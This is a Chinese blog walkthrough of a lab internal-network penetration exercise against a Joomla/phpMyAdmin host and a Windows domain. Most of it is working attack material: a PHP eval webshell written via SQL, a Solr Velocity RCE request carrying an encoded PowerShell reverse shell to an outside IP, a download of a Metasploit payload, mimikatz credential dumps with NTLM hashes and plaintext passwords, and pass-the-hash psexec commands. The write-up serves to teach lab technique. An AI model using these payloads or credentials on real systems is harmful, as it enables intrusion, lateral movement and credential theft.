记一次教学版内网渗透流程

news2024/11/18 20:44:06

信息收集

如果觉得文章写的不错可以共同交流
请添加图片描述

http://aertyxqdp1.target.yijinglab.com/

dirsearch

dirsearch -u "http://aertyxqdp1.target.yijinglab.com/"

发现

http://aertyxqdp1.target.yijinglab.com/joomla/

http://aertyxqdp1.target.yijinglab.com/phpMyAdmin/

http://aertyxqdp1.target.yijinglab.com/joomla/.git

漏洞探测

Githack获取源码

python GitHack.py http://aertyxqdp1.target.yijinglab.com/joomla/.git

获取到源码

public $user = 'root';
public $password = 'yijing666mingyyiyeryi666';

public $log_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\administrator/logs';
public $tmp_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla/tmp';

0

1

0

漏洞利用

登录phpmyadmin,写webshell

show global variables like "secure%";


select '<?php eval($_POST["pwd"]); ?>' into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\shelld41d8cd98f00b204.php';

2

查看权限

3

写webshell

4

链接

5

6

信息收集

Windows IP 配置
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : openstacklocal
   本地链接 IPv6 地址. . . . . . . . : fe80::4d4:61aa:24be:fb73%11
   IPv4 地址 . . . . . . . . . . . . : 172.16.36.63
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 172.16.36.254
隧道适配器 isatap.openstacklocal:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : openstacklocal

7

8

whoami

9

net time /domain

不在域内

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:329153f560eb329c0e1deea55e88a1e9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

administrator
root

内网转发

fscan简单扫扫

10

11

上传代理

http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php

12

python neoreg.py -u http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php -k 123456789

13

14

solr站点

15

看core

16

17

内网渗透

命令执行

http://172.16.36.133:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27powershell.exe%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAOAAyAC4AMQA1ADcALgAxADcAMwAuADEAMQAyACIALAA1ADAANQA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

在82.157.173.112服务器上

nc -lvnp 5056

反弹成功

18

同层2个机器

172.16.36.63
172.16.36.133 (双网卡)

在172.16.36.133信息收集发现172.16段

19

下msf马

$p = new-object system.net.webclient
$p.downloadfile("http://82.157.173.112:8081/shell.exe","shell.exe")

反弹

20

21

80机器(在域内)

net time /domain

22

传fscan

扫描172.16.16.0/24

f.exe -h 172.16.16.0/24 -o r16.txt

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
(icmp) Target 172.16.16.1     is alive
(icmp) Target 172.16.16.33    is alive
(icmp) Target 172.16.16.80    is alive
(icmp) Target 172.16.16.189   is alive
[*] Icmp alive hosts len is: 4
172.16.16.80:139 open
172.16.16.189:445 open
172.16.16.33:445 open
172.16.16.80:445 open
172.16.16.189:139 open
172.16.16.33:139 open
172.16.16.189:135 open
172.16.16.80:21 open
172.16.16.189:88 open
172.16.16.80:80 open
172.16.16.33:135 open
172.16.16.80:135 open
172.16.16.80:8983 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.16.16.189
   [->]WIN-MVNE1SFJ0LQ
   [->]172.16.16.189
[*] WebTitle: http://172.16.16.80       code:200 len:689    title:IIS7
[+] 172.16.16.80        MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[+] 172.16.16.189       MS17-010        (Windows Server 2012 R2 Standard 9600)
[*] NetInfo:
[*]172.16.16.33
   [->]WIN-T02F2T5601J
   [->]172.16.16.33
[*] NetBios: 172.16.16.33    WIN-T02F2T5601J.dog.local           Windows Server 2016 Standard 14393 
[*] WebTitle: http://172.16.16.80:8983  code:302 len:0      title:None 跳转url: http://172.16.16.80:8983/solr/
[*] WebTitle: http://172.16.16.80:8983/solr/ code:200 len:14887  title:Solr Admin
[+] http://172.16.16.80:8983 poc-yaml-solr-velocity-template-rce 
已完成 13/13
[*] 扫描结束,耗时: 18.0771485s

23

综上

172.16.16.189 是域控

域名是dog.local

net view /domain:dog

24

域内还有有172.16.16.33这个机器

在80机器上加载kiwi

kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 1190960344 (00000000:46fc9cd8)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:09:46
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1186680366 (00000000:46bb4e2e)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:08:00
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : cf28dfb90f2faa3f856b4f2fa1d55fe9
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1177681477 (00000000:4631fe45)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:04:07
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1169604964 (00000000:45b6c164)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:00:36
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 20558839 (00000000:0139b3f7)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:00:15
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * NTLM     : 161cff084477fe596a5db81874498a24
        tspkg :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 20364385 (00000000:0136bc61)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 12:57:41
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * NTLM     : 161cff084477fe596a5db81874498a24
        tspkg :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 12666668 (00000000:00c1472c)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:35:42
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 12437392 (00000000:00bdc790)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:31:28
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 10819842 (00000000:00a51902)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:14:05
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 9333731 (00000000:008e6be3)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:50:00
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : administrator
         * Domain   : WIN-T02F2T5601J
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : administrator
         * Domain   : WIN-T02F2T5601J
         * Password : 1qaz@WSX
        wdigest :
         * Username : administrator
         * Domain   : WIN-T02F2T5601J
         * Password : 1qaz@WSX
        kerberos :
         * Username : administrator
         * Domain   : WIN-T02F2T5601J
         * Password : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 7246833 (00000000:006e93f1)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:36:41
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 6122549 (00000000:005d6c35)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:20:48
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : administrator
         * Domain   : SOLR
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        wdigest :
         * Username : administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        kerberos :
         * Username : administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        ssp :
        credman :

Authentication Id : 0 ; 342819 (00000000:00053b23)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2024/4/11 7:47:09
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
        msv :
         [00000003] Primary
         * Username : SOLR$
         * Domain   : DOG
         * NTLM     : fe1b9cb384f267f3bf2bb9192d927910
         * SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
        tspkg :
         * Username : SOLR$
         * Domain   : DOG
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        wdigest :
         * Username : SOLR$
         * Domain   : DOG
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        kerberos :
         * Username : SOLR$
         * Domain   : dog.local
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        ssp :
        credman :

Authentication Id : 0 ; 136069 (00000000:00021385)
Session           : Interactive from 1
User Name         : Administrator
Domain            : SOLR
Logon Server      : SOLR
Logon Time        : 2024/4/11 7:45:17
SID               : S-1-5-21-2356296415-3603686952-1554484469-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * LM       : f67ce55ac831223dc187b8085fe1d9df
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : 1qaz@WSX
        ssp :
         [00000000]
         * Username : administrator
         * Domain   : (null)
         * Password : 1qaz@WSX
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 7:45:06
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:45
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SOLR$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:45
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : SOLR$
         * Domain   : DOG
         * NTLM     : fe1b9cb384f267f3bf2bb9192d927910
         * SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
        tspkg :
        wdigest :
         * Username : SOLR$
         * Domain   : DOG
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        kerberos :
         * Username : solr$
         * Domain   : DOG.LOCAL
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        ssp :
        credman :

Authentication Id : 0 ; 33980 (00000000:000084bc)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:42
SID               : 
        msv :
         [00000003] Primary
         * Username : SOLR$
         * Domain   : DOG
         * NTLM     : fe1b9cb384f267f3bf2bb9192d927910
         * SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7f
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SOLR$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:41
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : SOLR$
         * Domain   : DOG
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        kerberos :
         * Username : solr$
         * Domain   : DOG.LOCAL
         * Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5
        ssp :
        credman :

其他获取的密码

25

攻击内网主机

哈希传递打33机器

use windows/smb/ms17_010_psexec

set smbuser administrator

set SMBDomain dog.local

set SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2

成功反弹

26

27

28

切换下路由哈希传递打189

use  exploit/windows/smb/psexec

set SMBUser administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2

29

读取189密码

30

ipconfig

31

33的密码

Authentication Id : 0 ; 243527 (00000000:0003b747)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-T02F2T5601J
Logon Server      : WIN-T02F2T5601J
Logon Time        : 2024/4/11 9:01:45
SID               : S-1-5-21-1188958703-4046475421-80252671-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * NTLM     : 161cff084477fe596a5db81874498a24
         * SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039d
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 40882 (00000000:00009fb2)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:53
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742
         * SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
        tspkg :
        wdigest :
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-T02F2T5601J$
         * Domain   : dog.local
         * Password : 6ivL>l5L4k%2OFgmyC*d9R.@v),mOXR^4:xGSteG#;P^n&48N""C4Y=>9C0K&P+%/x9B+0%#k=nXHl8ho(7Qq`:Ovt"iOBq1zy `7C$ wO`Nv-z=&'P"haR*
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-T02F2T5601J$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:51
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742
         * SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
        tspkg :
        wdigest :
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : win-t02f2t5601j$
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 21095 (00000000:00005267)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:48
SID               : 
        msv :
         [00000003] Primary
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742
         * SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 2678848 (00000000:0028e040)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:07:39
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 2641030 (00000000:00284c86)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:01:37
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * NTLM     : 161cff084477fe596a5db81874498a24
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : WIN-T02F2T5601J
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 2617925 (00000000:0027f245)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 12:59:03
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SOLR
         * NTLM     : 161cff084477fe596a5db81874498a24
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SOLR
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1758011 (00000000:001ad33b)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:56:43
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 1550764 (00000000:0017a9ac)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:54:13
SID               : S-1-5-18
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 504399 (00000000:0007b24f)
Session           : Interactive from 2
User Name         : administrator
Domain            : DOG
Logon Server      : WIN-MVNE1SFJ0LQ
Logon Time        : 2024/4/11 9:11:41
SID               : S-1-5-21-2515766443-2959740750-3575737072-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : DOG
         * NTLM     : e054e61488f2545292d4e5b9f722d9a2
         * SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7
         * DPAPI    : cf28dfb90f2faa3f856b4f2fa1d55fe9
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : administrator
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 488613 (00000000:000774a5)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 9:10:45
SID               : S-1-5-90-0-2
        msv :
         [00000003] Primary
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742
         * SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939b
        tspkg :
        wdigest :
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-T02F2T5601J$
         * Domain   : dog.local
         * Password : 6ivL>l5L4k%2OFgmyC*d9R.@v),mOXR^4:xGSteG#;P^n&48N""C4Y=>9C0K&P+%/x9B+0%#k=nXHl8ho(7Qq`:Ovt"iOBq1zy `7C$ wO`Nv-z=&'P"haR*
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:54
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-T02F2T5601J$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:48
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN-T02F2T5601J$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : win-t02f2t5601j$
         * Domain   : DOG.LOCAL
         * Password : (null)
        ssp :
        credman :

189的密码

kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 40540132 (00000000:026a97e4)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 11:49:36
SID               : S-1-5-90-2
        msv :
         [00000003] Primary
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * NTLM     : 94901a951ee2d32e070982b4276eebd6
         * SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3
        tspkg :
        wdigest :
         * Username : WIN-MVNE1SFJ0LQ$
         * Domain   : DOG
         * Password : (null)
        kerberos :
         * Username : WIN-MVNE1SFJ0LQ$
